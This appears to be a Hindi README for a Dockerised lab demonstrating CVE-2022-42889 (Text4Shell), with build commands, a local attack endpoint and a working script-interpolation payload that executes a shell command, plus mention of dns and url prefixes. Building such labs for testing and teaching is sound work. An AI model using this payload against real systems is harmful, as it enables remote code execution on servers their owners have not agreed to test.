
# CVE-2022-42889 (Text4Shell) के लिए डॉकराइज़्ड प्रूफ-ऑफ-कॉन्सेप्ट, जिसमें स्क्रिप्ट, DNS, और URL लुकअप-आधारित RCE पेलोड शामिल हैं, सुरक्षा परीक्षण और शिक्षा के लिए।
mvn clean install
docker build --tag=text4shell .
docker run -p 80:8080 text4shell
http://localhost/text4shell/attack?search=<anything>
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
आप dns या url प्रीफिक्स का भी उपयोग कर सकते हैं।
कंटेनर ID प्राप्त करें
docker container ls
docker exec -it <container_id> bash
/tmp डायरेक्टरी में foo नामक फ़ाइल बनती दिखनी चाहिए):ls /tmp/
docker container stop <container_id>